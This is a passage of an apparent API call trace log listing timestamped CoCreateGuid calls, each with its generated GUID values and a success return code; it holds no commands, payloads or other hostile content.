Data4=([0]=0xa3, [1]=0x47, [2]=0xf8, [3]=0x5b, [4]=0xcb, [5]=0x15, [6]=0xf4, [7]=0x22))) returned 0x0 [0197.694] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xed300e3, Data2=0x1453, Data3=0x4cdd, Data4=([0]=0x8b, [1]=0xd8, [2]=0x71, [3]=0x9b, [4]=0x67, [5]=0xe3, [6]=0xcf, [7]=0x82))) returned 0x0 [0197.695] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x14060a02, Data2=0xb294, Data3=0x4a8c, Data4=([0]=0x91, [1]=0x8f, [2]=0x97, [3]=0xf8, [4]=0x46, [5]=0xff, [6]=0x5, [7]=0x61))) returned 0x0 [0197.695] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa5cbfcc4, Data2=0x2833, Data3=0x4c45, Data4=([0]=0x8e, [1]=0xa1, [2]=0x9b, [3]=0x8c, [4]=0x7a, [5]=0xa9, [6]=0xc0, [7]=0x44))) returned 0x0 [0197.696] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xba1cfdb7, Data2=0xd0c1, Data3=0x414f, Data4=([0]=0x97, [1]=0xe2, [2]=0x17, [3]=0x78, [4]=0xbd, [5]=0xb1, [6]=0x47, [7]=0x71))) returned 0x0 [0197.697] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd12b4433, Data2=0xded3, Data3=0x40d6, Data4=([0]=0x91, [1]=0x79, [2]=0x9e, [3]=0xda, [4]=0x51, [5]=0xc8, [6]=0xb9, [7]=0x86))) returned 0x0 [0197.697] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x169473b0, Data2=0x336c, Data3=0x4ea5, Data4=([0]=0x83, [1]=0xa5, [2]=0xcd, [3]=0x10, [4]=0x84, [5]=0x99, [6]=0x35, [7]=0x7))) returned 0x0 [0197.698] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa332b331, Data2=0xde13, Data3=0x4d39, Data4=([0]=0x83, [1]=0x92, [2]=0x23, [3]=0xd0, [4]=0xfd, [5]=0xc7, [6]=0x17, [7]=0x5d))) returned 0x0 [0197.698] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x6c57a6de, Data2=0x78e6, Data3=0x48c8, Data4=([0]=0x82, [1]=0x89, [2]=0x7b, [3]=0xa0, [4]=0x68, [5]=0xf, [6]=0x76, [7]=0xdc))) returned 0x0 [0197.699] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x24abb5a3, Data2=0x8afb, Data3=0x425c, Data4=([0]=0xa0, [1]=0xc4, [2]=0x92, [3]=0xb8, [4]=0xca, [5]=0x3d, [6]=0x15, [7]=0x3f))) returned 0x0 [0197.699] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xdd961181, Data2=0x630f, Data3=0x4724, Data4=([0]=0xa5, [1]=0x67, [2]=0x5, [3]=0x35, [4]=0xd2, [5]=0x4b, [6]=0xc4, [7]=0x1e))) returned 0x0 [0197.700] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x60a869c5, Data2=0x5c47, Data3=0x4bd6, Data4=([0]=0x99, [1]=0x35, [2]=0x2a, [3]=0xa6, [4]=0xa3, [5]=0x9, [6]=0x90, [7]=0xf0))) returned 0x0 [0197.700] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x203c39d8, Data2=0x7381, Data3=0x41f5, Data4=([0]=0x94, [1]=0xb9, [2]=0x7a, [3]=0x19, [4]=0x85, [5]=0x42, [6]=0x57, [7]=0xed))) returned 0x0 [0197.701] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc00a5234, Data2=0xaa9e, Data3=0x425c, Data4=([0]=0xa6, [1]=0xad, [2]=0x8a, [3]=0xfc, [4]=0xbc, [5]=0xf9, [6]=0xdd, [7]=0x5))) returned 0x0 [0197.703] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x48d09839, Data2=0x4191, Data3=0x4599, Data4=([0]=0x9a, [1]=0xa8, [2]=0x1c, [3]=0xf5, [4]=0xa3, [5]=0x46, [6]=0xbc, [7]=0xb6))) returned 0x0 [0197.703] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcbc2c218, Data2=0x9b64, Data3=0x429a, Data4=([0]=0xb5, [1]=0x9, [2]=0xd7, [3]=0x9e, [4]=0x43, [5]=0x2a, [6]=0x4d, [7]=0xa6))) returned 0x0 [0197.704] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x390a79c7, Data2=0x7ac9, Data3=0x43b4, Data4=([0]=0xbc, [1]=0x5, [2]=0xb1, [3]=0xda, [4]=0x3b, [5]=0xe8, [6]=0x88, [7]=0x95))) returned 0x0 [0197.705] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xad7f8837, Data2=0xe1ab, Data3=0x4d8d, Data4=([0]=0x80, [1]=0x16, [2]=0x50, [3]=0xec, [4]=0x3e, [5]=0xa7, [6]=0x38, [7]=0x30))) returned 0x0 [0197.706] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x63b1af51, Data2=0xc3ac, Data3=0x4db8, Data4=([0]=0x8d, [1]=0xd4, [2]=0x6f, [3]=0xac, [4]=0x27, [5]=0x80, [6]=0x32, [7]=0xb8))) returned 0x0 [0197.707] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7767cdbc, Data2=0xa45c, Data3=0x4256, Data4=([0]=0x84, [1]=0x24, [2]=0x6, [3]=0xf2, [4]=0xb6, [5]=0x36, [6]=0x38, [7]=0x2))) returned 0x0 [0197.709] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x19e54db7, Data2=0x498f, Data3=0x45de, Data4=([0]=0xad, [1]=0xe2, [2]=0x76, [3]=0x35, [4]=0xf9, [5]=0xb2, [6]=0xc3, [7]=0x7d))) returned 0x0 [0197.709] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7d9cb005, Data2=0x1d3, Data3=0x493b, Data4=([0]=0x88, [1]=0x72, [2]=0x26, [3]=0x79, [4]=0xb6, [5]=0x87, [6]=0x34, [7]=0x78))) returned 0x0 [0197.710] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe5bdcc1a, Data2=0x1fa6, Data3=0x439f, Data4=([0]=0xba, [1]=0x1a, [2]=0x81, [3]=0x4e, [4]=0xee, [5]=0xa1, [6]=0x95, [7]=0x54))) returned 0x0 [0197.710] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x688eeb29, Data2=0x76bb, Data3=0x4f4f, Data4=([0]=0x9b, [1]=0x9e, [2]=0x42, [3]=0x96, [4]=0x2a, [5]=0xbb, [6]=0xe7, [7]=0x30))) returned 0x0 [0197.710] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd2c6344e, Data2=0xaa42, Data3=0x4871, Data4=([0]=0x92, [1]=0xfe, [2]=0xc0, [3]=0x41, [4]=0x59, [5]=0x58, [6]=0x80, [7]=0x80))) returned 0x0 [0197.711] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x79a67a64, Data2=0x6bed, Data3=0x40be, Data4=([0]=0xb1, [1]=0x30, [2]=0x67, [3]=0xba, [4]=0xd4, [5]=0xec, [6]=0xc0, [7]=0x55))) returned 0x0 [0197.711] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xbde672d6, Data2=0x286d, Data3=0x4935, Data4=([0]=0xa6, [1]=0x60, [2]=0x96, [3]=0x2e, [4]=0x39, [5]=0x80, [6]=0xd2, [7]=0x24))) returned 0x0 [0197.711] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xad7c3094, Data2=0xfaad, Data3=0x47a0, Data4=([0]=0x8f, [1]=0x66, [2]=0x3b, [3]=0xae, [4]=0x8c, [5]=0x9e, [6]=0x2e, [7]=0x5a))) returned 0x0 [0197.712] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf14f1a41, Data2=0x78d7, Data3=0x4105, Data4=([0]=0xa9, [1]=0xe, [2]=0xd6, [3]=0xf5, [4]=0x31, [5]=0xc1, [6]=0x4a, [7]=0x5b))) returned 0x0 [0197.712] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x9b2868be, Data2=0x6c0c, Data3=0x43cb, Data4=([0]=0x9a, [1]=0x78, [2]=0xe8, [3]=0x5f, [4]=0xa4, [5]=0x21, [6]=0xce, [7]=0x3a))) returned 0x0 [0197.713] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2a2af694, Data2=0xc47e, Data3=0x45be, Data4=([0]=0xa4, [1]=0x37, [2]=0xad, [3]=0x1, [4]=0xa9, [5]=0xc2, [6]=0xc8, [7]=0x61))) returned 0x0 [0197.713] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf7fa5416, Data2=0xa9f6, Data3=0x40d1, Data4=([0]=0xac, [1]=0xc6, [2]=0xcc, [3]=0x85, [4]=0xf5, [5]=0x43, [6]=0x65, [7]=0xa1))) returned 0x0 [0197.713] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa5e7681, Data2=0xd5c8, Data3=0x4314, Data4=([0]=0x8e, [1]=0xaf, [2]=0x8d, [3]=0x34, [4]=0x12, [5]=0xf0, [6]=0x18, [7]=0xc2))) returned 0x0 [0197.762] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x84bdb065, Data2=0xbfb6, Data3=0x400b, Data4=([0]=0xbc, [1]=0x19, [2]=0x5f, [3]=0xb3, [4]=0x64, [5]=0xb1, [6]=0xf3, [7]=0xa5))) returned 0x0 [0197.762] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xce6fe3c8, Data2=0x5109, Data3=0x4d45, Data4=([0]=0x81, [1]=0x74, [2]=0x54, [3]=0xd2, [4]=0x52, [5]=0xb0, [6]=0xda, [7]=0xaf))) returned 0x0 [0197.763] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x87dd8ce2, Data2=0x596c, Data3=0x4398, Data4=([0]=0x93, [1]=0xab, [2]=0xfb, [3]=0x9, [4]=0x73, [5]=0x59, [6]=0x9f, [7]=0xe6))) returned 0x0 [0197.763] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x78e516b8, Data2=0xd0a5, Data3=0x4269, Data4=([0]=0xaa, [1]=0x15, [2]=0xc8, [3]=0xaf, [4]=0xf5, [5]=0x97, [6]=0x3, [7]=0xaf))) returned 0x0 [0197.763] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa76a7fd3, Data2=0xf02a, Data3=0x476f, Data4=([0]=0xaf, [1]=0x8c, [2]=0x8e, [3]=0x1a, [4]=0x62, [5]=0x74, [6]=0xc7, [7]=0xc1))) returned 0x0 [0197.764] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x8fe8ded1, Data2=0x2ca4, Data3=0x49d8, Data4=([0]=0xbe, [1]=0x5c, [2]=0xe5, [3]=0x6b, [4]=0x72, [5]=0x12, [6]=0xe0, [7]=0x46))) returned 0x0 [0197.764] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe6111454, Data2=0x6b8f, Data3=0x402f, Data4=([0]=0xa7, [1]=0xee, [2]=0x2c, [3]=0x65, [4]=0x96, [5]=0x51, [6]=0x1a, [7]=0x4e))) returned 0x0 [0197.765] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x65cabc7, Data2=0x788e, Data3=0x4788, Data4=([0]=0xaa, [1]=0x3a, [2]=0xd6, [3]=0xb4, [4]=0xdf, [5]=0xf6, [6]=0x88, [7]=0xad))) returned 0x0 [0197.765] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xdd59d06c, Data2=0x21ac, Data3=0x473a, Data4=([0]=0x9d, [1]=0x98, [2]=0xb7, [3]=0xb3, [4]=0x75, [5]=0x6e, [6]=0x63, [7]=0x83))) returned 0x0 [0197.766] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x46538310, Data2=0xc65f, Data3=0x46c4, Data4=([0]=0x88, [1]=0xad, [2]=0x21, [3]=0xd4, [4]=0xae, [5]=0xb3, [6]=0xea, [7]=0xaa))) returned 0x0 [0197.767] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xed7dd374, Data2=0x8474, Data3=0x4fda, Data4=([0]=0xb6, [1]=0x48, [2]=0xf3, [3]=0x76, [4]=0x4a, [5]=0x8c, [6]=0x95, [7]=0x51))) returned 0x0 [0197.767] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd9f29444, Data2=0x411f, Data3=0x41d5, Data4=([0]=0xa3, [1]=0x9, [2]=0x9a, [3]=0x4, [4]=0x7c, [5]=0x18, [6]=0xf4, [7]=0x49))) returned 0x0 [0197.767] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x85541bbb, Data2=0x30e5, Data3=0x4516, Data4=([0]=0x84, [1]=0xc0, [2]=0x1c, [3]=0xd9, [4]=0x53, [5]=0x3, [6]=0xb1, [7]=0x16))) returned 0x0 [0197.768] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x502c1c5c, Data2=0x334, Data3=0x4dad, Data4=([0]=0xbd, [1]=0xe4, [2]=0x71, [3]=0xeb, [4]=0x17, [5]=0x59, [6]=0xc8, [7]=0x19))) returned 0x0 [0197.768] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4a217d12, Data2=0xba8e, Data3=0x41da, Data4=([0]=0x9e, [1]=0xa1, [2]=0xb8, [3]=0x73, [4]=0x76, [5]=0xd7, [6]=0x12, [7]=0x34))) returned 0x0 [0197.768] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc2aa8466, Data2=0x2d26, Data3=0x408f, Data4=([0]=0x82, [1]=0x8, [2]=0x7d, [3]=0x33, [4]=0xa7, [5]=0x1e, [6]=0x68, [7]=0xd0))) returned 0x0 [0197.769] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xdd811538, Data2=0x1373, Data3=0x4215, Data4=([0]=0xa2, [1]=0x8d, [2]=0xec, [3]=0x59, [4]=0x53, [5]=0x8b, [6]=0xc6, [7]=0x58))) returned 0x0 [0197.770] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x923c53b5, Data2=0x2eb5, Data3=0x41ff, Data4=([0]=0xaa, [1]=0xe, [2]=0xb0, [3]=0xf6, [4]=0xe1, [5]=0xd8, [6]=0x85, [7]=0xd1))) returned 0x0 [0197.770] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x33d0b5d3, Data2=0x4c06, Data3=0x40b3, Data4=([0]=0xbf, [1]=0xda, [2]=0xc, [3]=0x5d, [4]=0x4f, [5]=0xd5, [6]=0xee, [7]=0x58))) returned 0x0 [0197.771] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3a92943d, Data2=0x94fc, Data3=0x4c22, Data4=([0]=0xb4, [1]=0x58, [2]=0x2d, [3]=0x59, [4]=0xba, [5]=0x9b, [6]=0x87, [7]=0x87))) returned 0x0 [0197.771] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xeb12983d, Data2=0x6bb1, Data3=0x4515, Data4=([0]=0xac, [1]=0x30, [2]=0x50, [3]=0xb1, [4]=0xde, [5]=0xae, [6]=0xee, [7]=0x7))) returned 0x0 [0197.772] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7e671a0, Data2=0x7f78, Data3=0x4acf, Data4=([0]=0x9f, [1]=0x3d, [2]=0xc9, [3]=0xd7, [4]=0x61, [5]=0x1, [6]=0x67, [7]=0x9c))) returned 0x0 [0197.772] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc638815b, Data2=0x3c38, Data3=0x458d, Data4=([0]=0x86, [1]=0xd, [2]=0xed, [3]=0xb4, [4]=0x5f, [5]=0x98, [6]=0x6a, [7]=0x76))) returned 0x0 [0197.772] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7406ee55, Data2=0x8ee5, Data3=0x49ae, Data4=([0]=0xaa, [1]=0x8c, [2]=0xe1, [3]=0x51, [4]=0x4b, [5]=0xd0, [6]=0xa7, [7]=0x73))) returned 0x0 [0197.772] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf0b43990, Data2=0xccd8, Data3=0x42e1, Data4=([0]=0xbe, [1]=0x4e, [2]=0x7e, [3]=0x57, [4]=0xbe, [5]=0xc6, [6]=0x9b, [7]=0xf9))) returned 0x0 [0197.773] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x488f5d30, Data2=0xf027, Data3=0x42e6, Data4=([0]=0x8c, [1]=0xc8, [2]=0xfc, [3]=0x62, [4]=0x9b, [5]=0x71, [6]=0xb9, [7]=0xb0))) returned 0x0 [0197.773] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe9b16fc1, Data2=0x4f14, Data3=0x4da3, Data4=([0]=0xa5, [1]=0x29, [2]=0xf9, [3]=0xfd, [4]=0xc, [5]=0x72, [6]=0xa8, [7]=0xff))) returned 0x0 [0197.773] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3d54623f, Data2=0x1e8c, Data3=0x4e4a, Data4=([0]=0xb8, [1]=0x7a, [2]=0xfa, [3]=0xf7, [4]=0x99, [5]=0x38, [6]=0x2a, [7]=0x85))) returned 0x0 [0197.774] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xb9fbc168, Data2=0x8d17, Data3=0x4300, Data4=([0]=0x9f, [1]=0x39, [2]=0x14, [3]=0x9d, [4]=0x46, [5]=0xfa, [6]=0x20, [7]=0x2a))) returned 0x0 [0197.774] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x5013b4ff, Data2=0xe38a, Data3=0x41b9, Data4=([0]=0x81, [1]=0xe5, [2]=0xa2, [3]=0xf5, [4]=0xc0, [5]=0xbd, [6]=0x90, [7]=0x66))) returned 0x0 [0197.774] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2479c0, Data2=0xe3a1, Data3=0x43ce, Data4=([0]=0x8b, [1]=0xfa, [2]=0x3e, [3]=0xb7, [4]=0x82, [5]=0xad, [6]=0xb8, [7]=0xa8))) returned 0x0 [0197.775] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xb0ec16dd, Data2=0x24db, Data3=0x4fce, Data4=([0]=0x90, [1]=0x28, [2]=0x2d, [3]=0xc3, [4]=0x5d, [5]=0x89, [6]=0x8a, [7]=0x7f))) returned 0x0 [0197.775] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc34cf11f, Data2=0x6ad7, Data3=0x4441, Data4=([0]=0xb3, [1]=0x45, [2]=0x1d, [3]=0x49, [4]=0x12, [5]=0x51, [6]=0x24, [7]=0x80))) returned 0x0 [0197.775] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x31d71c17, Data2=0x5dbc, Data3=0x457e, Data4=([0]=0x91, [1]=0x8c, [2]=0x49, [3]=0x7d, [4]=0x7, [5]=0x5e, [6]=0x4a, [7]=0xc6))) returned 0x0 [0197.776] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd5c1ba53, Data2=0xd8b0, Data3=0x405e, Data4=([0]=0x92, [1]=0xb7, [2]=0x7b, [3]=0x85, [4]=0x7c, [5]=0xc7, [6]=0x13, [7]=0x79))) returned 0x0 [0197.776] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x208b4326, Data2=0x7ad4, Data3=0x4427, Data4=([0]=0x92, [1]=0x4e, [2]=0x78, [3]=0xd7, [4]=0x2d, [5]=0x1d, [6]=0x5a, [7]=0xd))) returned 0x0 [0197.777] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xfd92267e, Data2=0x7a43, Data3=0x4976, Data4=([0]=0x92, [1]=0x45, [2]=0xcc, [3]=0x12, [4]=0x4c, [5]=0xd, [6]=0xd1, [7]=0x37))) returned 0x0 [0197.777] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xacd7040a, Data2=0x1de4, Data3=0x40c9, Data4=([0]=0x97, [1]=0x71, [2]=0x1c, [3]=0x4d, [4]=0xfa, [5]=0x3f, [6]=0x3c, [7]=0x53))) returned 0x0 [0197.778] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x8164b489, Data2=0x1e7a, Data3=0x489b, Data4=([0]=0xa2, [1]=0x83, [2]=0xec, [3]=0xe, [4]=0xd3, [5]=0xac, [6]=0xb1, [7]=0xc4))) returned 0x0 [0197.778] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x81bef679, Data2=0xcbbf, Data3=0x418f, Data4=([0]=0x8c, [1]=0x6c, [2]=0xc5, [3]=0xa8, [4]=0x1b, [5]=0x70, [6]=0xb5, [7]=0xf8))) returned 0x0 [0197.778] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x769ae624, Data2=0x6446, Data3=0x4552, Data4=([0]=0xbc, [1]=0xd8, [2]=0xa2, [3]=0x37, [4]=0x5c, [5]=0xd7, [6]=0x62, [7]=0x37))) returned 0x0 [0197.779] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa7645b9c, Data2=0x5e0b, Data3=0x46c2, Data4=([0]=0xb1, [1]=0xb7, [2]=0xbc, [3]=0xf8, [4]=0x89, [5]=0x2e, [6]=0xae, [7]=0x3f))) returned 0x0 [0197.779] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf80e7a75, Data2=0x5b8, Data3=0x4662, Data4=([0]=0x82, [1]=0xd9, [2]=0xd5, [3]=0x9c, [4]=0x49, [5]=0xa8, [6]=0xa8, [7]=0x1a))) returned 0x0 [0197.780] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xaabbc755, Data2=0x1f01, Data3=0x46eb, Data4=([0]=0x9f, [1]=0x9, [2]=0xaa, [3]=0x69, [4]=0xd0, [5]=0x26, [6]=0x66, [7]=0x8a))) returned 0x0 [0197.780] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe612adbd, Data2=0x5a23, Data3=0x4421, Data4=([0]=0xaf, [1]=0x1d, [2]=0x6c, [3]=0x3e, [4]=0xac, [5]=0x6, [6]=0x40, [7]=0x3b))) returned 0x0 [0197.780] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe246979b, Data2=0xe3c1, Data3=0x4991, Data4=([0]=0x92, [1]=0xfc, [2]=0x90, [3]=0xb9, [4]=0xa3, [5]=0x59, [6]=0xbc, [7]=0xe0))) returned 0x0 [0197.780] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xddcc7290, Data2=0x7538, Data3=0x41ab, Data4=([0]=0xbb, [1]=0x28, [2]=0x88, [3]=0xb1, [4]=0xa4, [5]=0x7b, [6]=0xdf, [7]=0x6d))) returned 0x0 [0197.781] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa6ebe53d, Data2=0x24c3, Data3=0x40a5, Data4=([0]=0x8f, [1]=0x4d, [2]=0x86, [3]=0x42, [4]=0x11, [5]=0x1a, [6]=0x89, [7]=0x85))) returned 0x0 [0197.781] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x8995da0c, Data2=0xb4a3, Data3=0x4600, Data4=([0]=0xa7, [1]=0x65, [2]=0xda, [3]=0xb, [4]=0xef, [5]=0x7, [6]=0xd7, [7]=0x4))) returned 0x0 [0197.781] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4e98c97b, Data2=0x2d66, Data3=0x4e45, Data4=([0]=0xa2, [1]=0xb9, [2]=0x8c, [3]=0x69, [4]=0xb1, [5]=0xed, [6]=0xdd, [7]=0xfc))) returned 0x0 [0197.782] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xb4328787, Data2=0x9b8b, Data3=0x43a6, Data4=([0]=0x84, [1]=0x25, [2]=0x4b, [3]=0xdb, [4]=0xdb, [5]=0xb5, [6]=0x14, [7]=0x71))) returned 0x0 [0197.782] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x9380b786, Data2=0xe541, Data3=0x4aeb, Data4=([0]=0x8d, [1]=0x64, [2]=0xa, [3]=0x91, [4]=0xae, [5]=0x38, [6]=0x78, [7]=0x7e))) returned 0x0 [0197.782] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7b2595fa, Data2=0xf111, Data3=0x474d, Data4=([0]=0xba, [1]=0x1b, [2]=0xea, [3]=0xe3, [4]=0x62, [5]=0x52, [6]=0xaf, [7]=0xbb))) returned 0x0 [0197.783] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x7209aed2, Data2=0x8e60, Data3=0x4bb3, Data4=([0]=0xba, [1]=0x16, [2]=0x4d, [3]=0xb5, [4]=0x21, [5]=0x19, [6]=0xb5, [7]=0x75))) returned 0x0 [0197.783] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4251ee9a, Data2=0x2d7b, Data3=0x4f06, Data4=([0]=0xa6, [1]=0xf9, [2]=0xea, [3]=0xb, [4]=0x98, [5]=0x25, [6]=0xef, [7]=0x8d))) returned 0x0 [0197.783] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x37edda1b, Data2=0x2dbd, Data3=0x48cf, Data4=([0]=0xb4, [1]=0x1e, [2]=0xae, [3]=0x8b, [4]=0xb1, [5]=0x46, [6]=0xda, [7]=0x6a))) returned 0x0 [0197.784] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa92c7399, Data2=0x9626, Data3=0x4140, Data4=([0]=0xaa, [1]=0x92, [2]=0x37, [3]=0xf5, [4]=0x3, [5]=0xbe, [6]=0x10, [7]=0x90))) returned 0x0 [0197.784] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xdb329f9a, Data2=0xac3e, Data3=0x44dc, Data4=([0]=0x8e, [1]=0x5d, [2]=0xc6, [3]=0x1, [4]=0x23, [5]=0xc9, [6]=0xc3, [7]=0x64))) returned 0x0 [0197.784] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe756cce1, Data2=0x30e9, Data3=0x47b3, Data4=([0]=0xba, [1]=0xe, [2]=0x90, [3]=0xf1, [4]=0x3f, [5]=0x3b, [6]=0xbb, [7]=0xa6))) returned 0x0 [0197.784] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf93718ee, Data2=0x9b77, Data3=0x4b8b, Data4=([0]=0x88, [1]=0xab, [2]=0xf, [3]=0x8, [4]=0x84, [5]=0xdd, [6]=0xc6, [7]=0x8a))) returned 0x0 [0197.785] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x62b9c70, Data2=0x46, Data3=0x421c, Data4=([0]=0xbd, [1]=0x7, [2]=0x1c, [3]=0x36, [4]=0xd7, [5]=0x51, [6]=0xc5, [7]=0xd8))) returned 0x0 [0197.785] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x30d4a978, Data2=0xee91, Data3=0x4263, Data4=([0]=0x8d, [1]=0xe2, [2]=0xc5, [3]=0x42, [4]=0x53, [5]=0x36, [6]=0x4f, [7]=0x95))) returned 0x0 [0197.786] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcaf4c108, Data2=0xab2b, Data3=0x4f62, Data4=([0]=0xa0, [1]=0xd1, [2]=0xfa, [3]=0x27, [4]=0xb2, [5]=0x87, [6]=0x13, [7]=0x87))) returned 0x0 [0197.786] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xc5280646, Data2=0x69a3, Data3=0x4359, Data4=([0]=0xbc, [1]=0xae, [2]=0x8e, [3]=0x78, [4]=0x4, [5]=0xe4, [6]=0x96, [7]=0x8d))) returned 0x0 [0197.786] CoCreateGuid (in: 